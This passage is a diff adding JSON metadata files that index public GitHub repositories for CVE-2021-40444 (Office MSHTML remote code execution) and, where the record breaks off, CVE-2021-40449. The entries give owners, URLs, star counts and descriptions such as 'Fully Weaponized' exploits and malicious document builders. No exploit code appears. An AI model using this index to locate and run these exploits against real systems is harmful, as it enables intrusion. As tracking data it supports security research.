+ "html_url": "https:\/\/github.com\/vysecurity"
+ },
+ "html_url": "https:\/\/github.com\/vysecurity\/CVE-2021-40444",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-09T23:41:52Z",
+ "updated_at": "2021-09-10T16:34:33Z",
+ "pushed_at": "2021-09-09T23:41:53Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 405030498,
+ "name": "CVE-2021-40444-Sample",
+ "full_name": "Udyz\/CVE-2021-40444-Sample",
+ "owner": {
+ "login": "Udyz",
+ "id": 39673284,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39673284?v=4",
+ "html_url": "https:\/\/github.com\/Udyz"
+ },
+ "html_url": "https:\/\/github.com\/Udyz\/CVE-2021-40444-Sample",
+ "description": "CVE-2021-40444 Sample ",
+ "fork": false,
+ "created_at": "2021-09-10T09:43:41Z",
+ "updated_at": "2024-06-24T14:24:18Z",
+ "pushed_at": "2021-09-11T10:35:20Z",
+ "stargazers_count": 77,
+ "watchers_count": 77,
+ "has_discussions": false,
+ "forks_count": 50,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 50,
+ "watchers": 77,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 405152543,
+ "name": "CVE-2021-40444",
+ "full_name": "lockedbyte\/CVE-2021-40444",
+ "owner": {
+ "login": "lockedbyte",
+ "id": 37779789,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37779789?v=4",
+ "html_url": "https:\/\/github.com\/lockedbyte"
+ },
+ "html_url": "https:\/\/github.com\/lockedbyte\/CVE-2021-40444",
+ "description": "CVE-2021-40444 PoC",
+ "fork": false,
+ "created_at": "2021-09-10T16:55:53Z",
+ "updated_at": "2024-06-25T16:08:41Z",
+ "pushed_at": "2021-12-25T18:31:02Z",
+ "stargazers_count": 1545,
+ "watchers_count": 1545,
+ "has_discussions": false,
+ "forks_count": 481,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 481,
+ "watchers": 1545,
+ "score": 0,
+ "subscribers_count": 28
+ },
+ {
+ "id": 405266779,
+ "name": "CVE-2021-40444-docx-Generate",
+ "full_name": "fengjixuchui\/CVE-2021-40444-docx-Generate",
+ "owner": {
+ "login": "fengjixuchui",
+ "id": 2487206,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2487206?v=4",
+ "html_url": "https:\/\/github.com\/fengjixuchui"
+ },
+ "html_url": "https:\/\/github.com\/fengjixuchui\/CVE-2021-40444-docx-Generate",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-11T02:49:37Z",
+ "updated_at": "2024-06-13T21:19:09Z",
+ "pushed_at": "2021-09-11T02:49:31Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 405292789,
+ "name": "CVE-2021-40444-docx-Generate",
+ "full_name": "KnoooW\/CVE-2021-40444-docx-Generate",
+ "owner": {
+ "login": "KnoooW",
+ "id": 4646393,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4646393?v=4",
+ "html_url": "https:\/\/github.com\/KnoooW"
+ },
+ "html_url": "https:\/\/github.com\/KnoooW\/CVE-2021-40444-docx-Generate",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-11T05:31:52Z",
+ "updated_at": "2023-11-22T16:49:02Z",
+ "pushed_at": "2021-09-11T03:11:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 405428447,
+ "name": "Caboom",
+ "full_name": "mansk1es\/Caboom",
+ "owner": {
+ "login": "mansk1es",
+ "id": 74832816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74832816?v=4",
+ "html_url": "https:\/\/github.com\/mansk1es"
+ },
+ "html_url": "https:\/\/github.com\/mansk1es\/Caboom",
+ "description": "A malicious .cab creation tool for CVE-2021-40444",
+ "fork": false,
+ "created_at": "2021-09-11T16:31:05Z",
+ "updated_at": "2024-01-28T23:43:55Z",
+ "pushed_at": "2021-09-12T09:08:23Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 405599465,
+ "name": "cve-2021-40444",
+ "full_name": "jamesrep\/cve-2021-40444",
+ "owner": {
+ "login": "jamesrep",
+ "id": 15976537,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15976537?v=4",
+ "html_url": "https:\/\/github.com\/jamesrep"
+ },
+ "html_url": "https:\/\/github.com\/jamesrep\/cve-2021-40444",
+ "description": "Reverse engineering the \"A Letter Before Court 4.docx\" malicious files exploting cve-2021-40444",
+ "fork": false,
+ "created_at": "2021-09-12T09:27:40Z",
+ "updated_at": "2021-09-12T12:00:29Z",
+ "pushed_at": "2021-09-12T12:00:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 405620068,
+ "name": "Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx",
+ "full_name": "W1kyri3\/Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx",
+ "owner": {
+ "login": "W1kyri3",
+ "id": 81154240,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81154240?v=4",
+ "html_url": "https:\/\/github.com\/W1kyri3"
+ },
+ "html_url": "https:\/\/github.com\/W1kyri3\/Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-12T11:12:58Z",
+ "updated_at": "2021-09-12T11:12:59Z",
+ "pushed_at": "2021-09-11T09:21:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 405716870,
+ "name": "CVE-2021-40444_builders",
+ "full_name": "aslitsecurity\/CVE-2021-40444_builders",
+ "owner": {
+ "login": "aslitsecurity",
+ "id": 9478055,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9478055?v=4",
+ "html_url": "https:\/\/github.com\/aslitsecurity"
+ },
+ "html_url": "https:\/\/github.com\/aslitsecurity\/CVE-2021-40444_builders",
+ "description": "This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit",
+ "fork": false,
+ "created_at": "2021-09-12T18:05:53Z",
+ "updated_at": "2024-06-24T14:24:09Z",
+ "pushed_at": "2021-10-11T20:53:19Z",
+ "stargazers_count": 171,
+ "watchers_count": 171,
+ "has_discussions": false,
+ "forks_count": 48,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 48,
+ "watchers": 171,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 405915598,
+ "name": "CVE-2021-40444",
+ "full_name": "khoaduynu\/CVE-2021-40444",
+ "owner": {
+ "login": "khoaduynu",
+ "id": 45584422,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45584422?v=4",
+ "html_url": "https:\/\/github.com\/khoaduynu"
+ },
+ "html_url": "https:\/\/github.com\/khoaduynu\/CVE-2021-40444",
+ "description": "POC for CVE-2021-40444",
+ "fork": false,
+ "created_at": "2021-09-13T09:46:04Z",
+ "updated_at": "2021-09-13T09:46:04Z",
+ "pushed_at": "2021-09-13T09:46:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 406397884,
+ "name": "MSHTMHell",
+ "full_name": "Jeromeyoung\/MSHTMHell",
+ "owner": {
+ "login": "Jeromeyoung",
+ "id": 39945364,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4",
+ "html_url": "https:\/\/github.com\/Jeromeyoung"
+ },
+ "html_url": "https:\/\/github.com\/Jeromeyoung\/MSHTMHell",
+ "description": "Malicious document builder for CVE-2021-40444 ",
+ "fork": false,
+ "created_at": "2021-09-14T14:20:38Z",
+ "updated_at": "2022-02-08T02:13:27Z",
+ "pushed_at": "2021-09-14T13:49:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 406942491,
+ "name": "CVE-2021-40444",
+ "full_name": "klezVirus\/CVE-2021-40444",
+ "owner": {
+ "login": "klezVirus",
+ "id": 8959898,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8959898?v=4",
+ "html_url": "https:\/\/github.com\/klezVirus"
+ },
+ "html_url": "https:\/\/github.com\/klezVirus\/CVE-2021-40444",
+ "description": "CVE-2021-40444 - Fully Weaponized Microsoft Office Word RCE Exploit",
+ "fork": false,
+ "created_at": "2021-09-15T22:34:35Z",
+ "updated_at": "2024-06-25T10:59:55Z",
+ "pushed_at": "2023-10-11T18:44:51Z",
+ "stargazers_count": 790,
+ "watchers_count": 790,
+ "has_discussions": false,
+ "forks_count": 169,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0day",
+ "cve-2021-40444",
+ "msword",
+ "office",
+ "rce",
+ "remote-code-execution"
+ ],
+ "visibility": "public",
+ "forks": 169,
+ "watchers": 790,
+ "score": 0,
+ "subscribers_count": 19
+ },
+ {
+ "id": 407116716,
+ "name": "CVE-2021-40444-CAB",
+ "full_name": "Udyz\/CVE-2021-40444-CAB",
+ "owner": {
+ "login": "Udyz",
+ "id": 39673284,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39673284?v=4",
+ "html_url": "https:\/\/github.com\/Udyz"
+ },
+ "html_url": "https:\/\/github.com\/Udyz\/CVE-2021-40444-CAB",
+ "description": "CVE-2021-40444 - Custom CAB templates from MakeCAB",
+ "fork": false,
+ "created_at": "2021-09-16T10:14:08Z",
+ "updated_at": "2024-06-13T21:13:23Z",
+ "pushed_at": "2021-09-16T10:20:10Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 408221589,
+ "name": "CVE-2021-40444--CABless",
+ "full_name": "Edubr2020\/CVE-2021-40444--CABless",
+ "owner": {
+ "login": "Edubr2020",
+ "id": 60452468,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60452468?v=4",
+ "html_url": "https:\/\/github.com\/Edubr2020"
+ },
+ "html_url": "https:\/\/github.com\/Edubr2020\/CVE-2021-40444--CABless",
+ "description": "Modified code so that we don´t need to rely on CAB archives",
+ "fork": false,
+ "created_at": "2021-09-19T19:46:28Z",
+ "updated_at": "2024-06-24T14:24:47Z",
+ "pushed_at": "2021-09-22T20:07:51Z",
+ "stargazers_count": 102,
+ "watchers_count": 102,
+ "has_discussions": false,
+ "forks_count": 22,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 22,
+ "watchers": 102,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 409931314,
+ "name": "CVE-2021-40444_CAB_archives",
+ "full_name": "kal1gh0st\/CVE-2021-40444_CAB_archives",
+ "owner": {
+ "login": "kal1gh0st",
+ "id": 56889513,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56889513?v=4",
+ "html_url": "https:\/\/github.com\/kal1gh0st"
+ },
+ "html_url": "https:\/\/github.com\/kal1gh0st\/CVE-2021-40444_CAB_archives",
+ "description": "CVE 2021 40444 Windows Exploit services.dll",
+ "fork": false,
+ "created_at": "2021-09-24T10:59:34Z",
+ "updated_at": "2021-12-15T00:43:34Z",
+ "pushed_at": "2021-10-21T09:46:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 411631202,
+ "name": "Docx-Exploit-2021",
+ "full_name": "LazarusReborn\/Docx-Exploit-2021",
+ "owner": {
+ "login": "LazarusReborn",
+ "id": 89079373,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89079373?v=4",
+ "html_url": "https:\/\/github.com\/LazarusReborn"
+ },
+ "html_url": "https:\/\/github.com\/LazarusReborn\/Docx-Exploit-2021",
+ "description": "This docx exploit uses res files inside Microsoft .docx file to execute malicious files. This exploit is related to CVE-2021-40444",
+ "fork": false,
+ "created_at": "2021-09-29T10:35:55Z",
+ "updated_at": "2023-05-04T17:48:06Z",
+ "pushed_at": "2021-09-29T10:45:43Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "botnet",
+ "docx",
+ "exploit",
+ "payload",
+ "rat",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 412946991,
+ "name": "CVE-2021-40444",
+ "full_name": "H0j3n\/CVE-2021-40444",
+ "owner": {
+ "login": "H0j3n",
+ "id": 51261763,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51261763?v=4",
+ "html_url": "https:\/\/github.com\/H0j3n"
+ },
+ "html_url": "https:\/\/github.com\/H0j3n\/CVE-2021-40444",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-03T01:13:42Z",
+ "updated_at": "2024-06-13T21:14:08Z",
+ "pushed_at": "2021-10-10T06:32:11Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-40444"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 417517068,
+ "name": "MSHTML-CVE-2021-40444",
+ "full_name": "metehangenel\/MSHTML-CVE-2021-40444",
+ "owner": {
+ "login": "metehangenel",
+ "id": 31937891,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31937891?v=4",
+ "html_url": "https:\/\/github.com\/metehangenel"
+ },
+ "html_url": "https:\/\/github.com\/metehangenel\/MSHTML-CVE-2021-40444",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-15T13:52:34Z",
+ "updated_at": "2022-12-16T15:56:59Z",
+ "pushed_at": "2021-09-16T17:53:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 417810289,
+ "name": "TIC4301_Project",
+ "full_name": "Jeromeyoung\/TIC4301_Project",
+ "owner": {
+ "login": "Jeromeyoung",
+ "id": 39945364,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4",
+ "html_url": "https:\/\/github.com\/Jeromeyoung"
+ },
+ "html_url": "https:\/\/github.com\/Jeromeyoung\/TIC4301_Project",
+ "description": "TIC4301 Project - CVE-2021-40444",
+ "fork": false,
+ "created_at": "2021-10-16T11:41:13Z",
+ "updated_at": "2021-10-16T11:41:14Z",
+ "pushed_at": "2021-10-16T08:52:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 420818304,
+ "name": "CVE-2021-40444",
+ "full_name": "tiagob0b\/CVE-2021-40444",
+ "owner": {
+ "login": "tiagob0b",
+ "id": 24528913,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24528913?v=4",
+ "html_url": "https:\/\/github.com\/tiagob0b"
+ },
+ "html_url": "https:\/\/github.com\/tiagob0b\/CVE-2021-40444",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-24T23:17:12Z",
+ "updated_at": "2021-10-24T23:17:28Z",
+ "pushed_at": "2021-10-24T23:17:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 422246280,
+ "name": "CVE-2021-40444-POC",
+ "full_name": "kagura-maru\/CVE-2021-40444-POC",
+ "owner": {
+ "login": "kagura-maru",
+ "id": 92495243,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92495243?v=4",
+ "html_url": "https:\/\/github.com\/kagura-maru"
+ },
+ "html_url": "https:\/\/github.com\/kagura-maru\/CVE-2021-40444-POC",
+ "description": "An attempt to reproduce Microsoft MSHTML Remote Code Execution (RCE) Vulnerability and using Metasploit Framework.",
+ "fork": false,
+ "created_at": "2021-10-28T14:55:46Z",
+ "updated_at": "2023-09-28T11:32:44Z",
+ "pushed_at": "2021-10-31T08:15:00Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 425935080,
+ "name": "word_mshtml",
+ "full_name": "Zeop-CyberSec\/word_mshtml",
+ "owner": {
+ "login": "Zeop-CyberSec",
+ "id": 68154603,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68154603?v=4",
+ "html_url": "https:\/\/github.com\/Zeop-CyberSec"
+ },
+ "html_url": "https:\/\/github.com\/Zeop-CyberSec\/word_mshtml",
+ "description": "Contains the offensive (exploit and auxiliary) modules for the CVE-2021-40444.",
+ "fork": false,
+ "created_at": "2021-11-08T17:38:30Z",
+ "updated_at": "2021-12-11T21:29:07Z",
+ "pushed_at": "2021-11-09T11:12:53Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 430718153,
+ "name": "CVE-2021-40444",
+ "full_name": "Alexcot25051999\/CVE-2021-40444",
+ "owner": {
+ "login": "Alexcot25051999",
+ "id": 94846095,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94846095?v=4",
+ "html_url": "https:\/\/github.com\/Alexcot25051999"
+ },
+ "html_url": "https:\/\/github.com\/Alexcot25051999\/CVE-2021-40444",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-22T13:29:20Z",
+ "updated_at": "2021-11-22T13:41:39Z",
+ "pushed_at": "2021-11-22T13:41:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 431721742,
+ "name": "CVE-2021-40444-exp",
+ "full_name": "lisinan988\/CVE-2021-40444-exp",
+ "owner": {
+ "login": "lisinan988",
+ "id": 87479262,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87479262?v=4",
+ "html_url": "https:\/\/github.com\/lisinan988"
+ },
+ "html_url": "https:\/\/github.com\/lisinan988\/CVE-2021-40444-exp",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-25T05:13:05Z",
+ "updated_at": "2021-11-25T05:13:19Z",
+ "pushed_at": "2021-11-25T05:13:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439810103,
+ "name": "Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit",
+ "full_name": "34zY\/Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit",
+ "owner": {
+ "login": "34zY",
+ "id": 55347142,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55347142?v=4",
+ "html_url": "https:\/\/github.com\/34zY"
+ },
+ "html_url": "https:\/\/github.com\/34zY\/Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit",
+ "description": "CVE-2021-40444",
+ "fork": false,
+ "created_at": "2021-12-19T08:16:07Z",
+ "updated_at": "2024-05-23T12:50:05Z",
+ "pushed_at": "2021-12-19T08:27:33Z",
+ "stargazers_count": 65,
+ "watchers_count": 65,
+ "has_discussions": false,
+ "forks_count": 24,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 24,
+ "watchers": 65,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 442372306,
+ "name": "CVE-2021-40444",
+ "full_name": "MRacumen\/CVE-2021-40444",
+ "owner": {
+ "login": "MRacumen",
+ "id": 73010693,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73010693?v=4",
+ "html_url": "https:\/\/github.com\/MRacumen"
+ },
+ "html_url": "https:\/\/github.com\/MRacumen\/CVE-2021-40444",
+ "description": "Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit",
+ "fork": false,
+ "created_at": "2021-12-28T06:33:25Z",
+ "updated_at": "2021-12-28T09:38:18Z",
+ "pushed_at": "2021-12-28T06:44:19Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 486415935,
+ "name": "CVE-2021-40444",
+ "full_name": "RedLeavesChilde\/CVE-2021-40444",
+ "owner": {
+ "login": "RedLeavesChilde",
+ "id": 104541969,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104541969?v=4",
+ "html_url": "https:\/\/github.com\/RedLeavesChilde"
+ },
+ "html_url": "https:\/\/github.com\/RedLeavesChilde\/CVE-2021-40444",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-28T02:14:10Z",
+ "updated_at": "2022-04-28T02:14:10Z",
+ "pushed_at": "2022-04-28T02:14:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 528470832,
+ "name": "CVE-2021-40444-Microsoft-Office-Word-Remote-Code-Execution-",
+ "full_name": "nvchungkma\/CVE-2021-40444-Microsoft-Office-Word-Remote-Code-Execution-",
+ "owner": {
+ "login": "nvchungkma",
+ "id": 59444526,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59444526?v=4",
+ "html_url": "https:\/\/github.com\/nvchungkma"
+ },
+ "html_url": "https:\/\/github.com\/nvchungkma\/CVE-2021-40444-Microsoft-Office-Word-Remote-Code-Execution-",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-08-24T14:55:11Z",
+ "updated_at": "2022-08-24T14:55:11Z",
+ "pushed_at": "2022-08-24T14:55:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 649499809,
+ "name": "CVE-2021-40444",
+ "full_name": "hqdat809\/CVE-2021-40444",
+ "owner": {
+ "login": "hqdat809",
+ "id": 75318916,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75318916?v=4",
+ "html_url": "https:\/\/github.com\/hqdat809"
+ },
+ "html_url": "https:\/\/github.com\/hqdat809\/CVE-2021-40444",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-06-05T02:27:21Z",
+ "updated_at": "2023-06-05T02:29:52Z",
+ "pushed_at": "2023-06-05T02:29:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 815284656,
+ "name": "CVE-2021-40444-POC",
+ "full_name": "skitkat\/CVE-2021-40444-POC",
+ "owner": {
+ "login": "skitkat",
+ "id": 97350255,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97350255?v=4",
+ "html_url": "https:\/\/github.com\/skitkat"
+ },
+ "html_url": "https:\/\/github.com\/skitkat\/CVE-2021-40444-POC",
+ "description": "For learning purpose did a complete analysis on CVE-2021-40444 POC (proof of concept)",
+ "fork": false,
+ "created_at": "2024-06-14T19:04:02Z",
+ "updated_at": "2024-06-14T19:04:05Z",
+ "pushed_at": "2024-06-14T19:04:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40449.json b/2021/CVE-2021-40449.json
new file mode 100644
index 0000000000..7011b1719d
--- /dev/null
+++ b/2021/CVE-2021-40449.json
@@ -0,0 +1,246 @@
+[
+ {
+ "id": 417881648,
+ "name": "CallbackHell",
+ "full_name": "ly4k\/CallbackHell",
+ "owner": {
+ "login": "ly4k",
+ "id": 53348818,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53348818?v=4",
+ "html_url": "https:\/\/github.com\/ly4k"
+ },
+ "html_url": "https:\/\/github.com\/ly4k\/CallbackHell",
+ "description": "Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)",
+ "fork": false,
+ "created_at": "2021-10-16T16:17:44Z",
+ "updated_at": "2024-06-21T11:38:28Z",
+ "pushed_at": "2021-11-11T17:09:56Z",
+ "stargazers_count": 459,
+ "watchers_count": 459,
+ "has_discussions": false,
+ "forks_count": 92,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-40449"
+ ],
+ "visibility": "public",
+ "forks": 92,
+ "watchers": 459,
+ "score": 0,
+ "subscribers_count": 13
+ },
+ {
+ "id": 419264342,
